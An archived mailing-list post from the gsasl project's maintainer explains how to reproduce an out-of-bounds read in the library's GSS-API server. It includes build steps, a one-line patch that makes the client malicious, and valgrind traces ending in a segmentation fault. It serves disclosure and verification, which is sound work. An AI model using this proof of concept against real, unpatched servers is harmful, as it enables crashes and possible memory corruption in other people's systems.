Reproducing GSS-API server vulnerability

help-gsasl

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Reproducing GSS-API server vulnerability

From:	Simon Josefsson
Subject:	Reproducing GSS-API server vulnerability
Date:	Fri, 15 Jul 2022 20:27:49 +0200
User-agent:	Gnus/5.13 (Gnus v5.13) Emacs/27.1 (gnu/linux)

If anyone is interested in reproducing the problem it should be a matter
of the following (using vulnerable version 2.0.0 as an example):

./configure  --with-gssapi-impl=mit
wget -O examples/smtp-server.c 
https://gitlab.com/gsasl/gsasl/-/raw/v2.0.1/examples/smtp-server.c
make
./libtool --mode=execute valgrind examples/smtp-server &

Setting up GSS-API including a KDC is the complicated part, but use
inspiration from CI/CD rules [1].

Then patch the GSS-API client code like this, to create a malicious
client:

--- gsasl-2.0.0.orig/lib/gssapi/client.c        2022-06-18 22:56:43.000000000 
+0200
+++ gsasl-2.0.0/lib/gssapi/client.c     2022-07-15 20:18:07.623425188 +0200
@@ -225,6 +225,7 @@
        memcpy (q + 4, p, strlen (p));
       }
 
+      bufdesc.length = 0;
       maj_stat = gss_wrap (&min_stat, state->context, 0, GSS_C_QOP_DEFAULT,
                           &bufdesc, &conf_state, &bufdesc2);
       free (bufdesc.value);

Then invoke

make
src/gsasl -m GSSAPI smtp.gsasl.example 2000 --smtp

you will get a nice valgrind output like this:

==719087== Invalid read of size 1
==719087==    at 0x485DE9D: _gsasl_gssapi_server_step (server.c:228)
==719087==    by 0x484C4BE: gsasl_step64 (xstep.c:100)
==719087==    by 0x109880: server_auth (smtp-server.c:120)
==719087==    by 0x109880: smtp (smtp-server.c:196)
==719087==    by 0x109880: main (smtp-server.c:322)
==719087==  Address 0x4cd4a20 is 0 bytes after a block of size 0 alloc'd
==719087==    at 0x483877F: malloc (vg_replace_malloc.c:307)
==719087==    by 0x4AC4624: UnknownInlinedFun (gssapi_alloc.h:102)
==719087==    by 0x4AC4624: gss_krb5int_unseal_token_v3 (k5sealv3.c:464)
==719087==    by 0x4AC56ED: kg_unseal (k5unseal.c:418)
==719087==    by 0x4AC56ED: kg_unseal (k5unseal.c:363)
==719087==    by 0x4AC5D7D: krb5_gss_unwrap (k5unseal.c:454)
==719087==    by 0x4AB3BD6: gss_unwrap (g_unseal.c:85)
==719087==    by 0x485DE86: _gsasl_gssapi_server_step (server.c:208)
==719087==    by 0x484C4BE: gsasl_step64 (xstep.c:100)
==719087==    by 0x109880: server_auth (smtp-server.c:120)
==719087==    by 0x109880: smtp (smtp-server.c:196)
==719087==    by 0x109880: main (smtp-server.c:322)

Using 'bufdesc.length = 3;' you trigger a more interesting output:

==715913== Invalid read of size 2
==715913==    at 0x483CEE0: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1032)
==715913==    by 0x484BD4B: gsasl_property_set_raw (property.c:227)
==715913==    by 0x485DEC4: _gsasl_gssapi_server_step (server.c:235)
==715913==    by 0x484C4BE: gsasl_step64 (xstep.c:100)
==715913==    by 0x109880: server_auth (smtp-server.c:120)
==715913==    by 0x109880: smtp (smtp-server.c:196)
==715913==    by 0x109880: main (smtp-server.c:322)
==715913==  Address 0x4cdcbe4 is 1 bytes after a block of size 3 alloc'd
==715913==    at 0x483877F: malloc (vg_replace_malloc.c:307)
==715913==    by 0x4AC4624: UnknownInlinedFun (gssapi_alloc.h:102)
==715913==    by 0x4AC4624: gss_krb5int_unseal_token_v3 (k5sealv3.c:464)
==715913==    by 0x4AC56ED: kg_unseal (k5unseal.c:418)
==715913==    by 0x4AC56ED: kg_unseal (k5unseal.c:363)
==715913==    by 0x4AC5D7D: krb5_gss_unwrap (k5unseal.c:454)
==715913==    by 0x4AB3BD6: gss_unwrap (g_unseal.c:85)
==715913==    by 0x485DE86: _gsasl_gssapi_server_step (server.c:208)
==715913==    by 0x484C4BE: gsasl_step64 (xstep.c:100)
==715913==    by 0x109880: server_auth (smtp-server.c:120)
==715913==    by 0x109880: smtp (smtp-server.c:196)
==715913==    by 0x109880: main (smtp-server.c:322)
==715913== 
==715913== Invalid write of size 2
==715913==    at 0x483CEE3: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1032)
==715913==    by 0x484BD4B: gsasl_property_set_raw (property.c:227)
==715913==    by 0x485DEC4: _gsasl_gssapi_server_step (server.c:235)
==715913==    by 0x484C4BE: gsasl_step64 (xstep.c:100)
==715913==    by 0x109880: server_auth (smtp-server.c:120)
==715913==    by 0x109880: smtp (smtp-server.c:196)
==715913==    by 0x109880: main (smtp-server.c:322)
==715913==  Address 0x4cdcc30 is 0 bytes after a block of size 0 alloc'd
==715913==    at 0x483877F: malloc (vg_replace_malloc.c:307)
==715913==    by 0x484BD35: gsasl_property_set_raw (property.c:223)
==715913==    by 0x485DEC4: _gsasl_gssapi_server_step (server.c:235)
==715913==    by 0x484C4BE: gsasl_step64 (xstep.c:100)
==715913==    by 0x109880: server_auth (smtp-server.c:120)
==715913==    by 0x109880: smtp (smtp-server.c:196)
==715913==    by 0x109880: main (smtp-server.c:322)
==715913== 
==715913== Invalid read of size 2
==715913==    at 0x483CEEF: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1032)
==715913==    by 0x484BD4B: gsasl_property_set_raw (property.c:227)
==715913==    by 0x485DEC4: _gsasl_gssapi_server_step (server.c:235)
==715913==    by 0x484C4BE: gsasl_step64 (xstep.c:100)
==715913==    by 0x109880: server_auth (smtp-server.c:120)
==715913==    by 0x109880: smtp (smtp-server.c:196)
==715913==    by 0x109880: main (smtp-server.c:322)
==715913==  Address 0x4cdcbe8 is 5 bytes after a block of size 3 alloc'd
==715913==    at 0x483877F: malloc (vg_replace_malloc.c:307)
==715913==    by 0x4AC4624: UnknownInlinedFun (gssapi_alloc.h:102)
==715913==    by 0x4AC4624: gss_krb5int_unseal_token_v3 (k5sealv3.c:464)
==715913==    by 0x4AC56ED: kg_unseal (k5unseal.c:418)
==715913==    by 0x4AC56ED: kg_unseal (k5unseal.c:363)
==715913==    by 0x4AC5D7D: krb5_gss_unwrap (k5unseal.c:454)
==715913==    by 0x4AB3BD6: gss_unwrap (g_unseal.c:85)
==715913==    by 0x485DE86: _gsasl_gssapi_server_step (server.c:208)
==715913==    by 0x484C4BE: gsasl_step64 (xstep.c:100)
==715913==    by 0x109880: server_auth (smtp-server.c:120)
==715913==    by 0x109880: smtp (smtp-server.c:196)
==715913==    by 0x109880: main (smtp-server.c:322)
==715913== 
==715913== 
==715913== Process terminating with default action of signal 11 (SIGSEGV)
==715913==  Bad permissions for mapped region at address 0x5054000
==715913==    at 0x483CEE3: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:1032)
==715913==    by 0x484BD4B: gsasl_property_set_raw (property.c:227)
==715913==    by 0x485DEC4: _gsasl_gssapi_server_step (server.c:235)
==715913==    by 0x484C4BE: gsasl_step64 (xstep.c:100)
==715913==    by 0x109880: server_auth (smtp-server.c:120)
==715913==    by 0x109880: smtp (smtp-server.c:196)
==715913==    by 0x109880: main (smtp-server.c:322)

Continuing downhill from here is left as an exercise for the reader...

/Simon

[1] https://gitlab.com/gsasl/gsasl/-/blob/v2.0.1/.gitlab-ci.yml#L413

signature.asc
Description: PGP signature

[Prev in Thread]

Current Thread

[Next in Thread]

[SECURITY ADVISORY] gsasl: Server out-of-bounds read with authenticated malicious GSS-API client, Simon Josefsson, 2022/07/15
- Reproducing GSS-API server vulnerability, Simon Josefsson <=

Prev by Date: [SECURITY ADVISORY] gsasl: Server out-of-bounds read with authenticated malicious GSS-API client
Next by Date: RFC 9266: Channel Bindings for TLS 1.3
Previous by thread: [SECURITY ADVISORY] gsasl: Server out-of-bounds read with authenticated malicious GSS-API client
Next by thread: RFC 9266: Channel Bindings for TLS 1.3
Index(es):
- Date
- Thread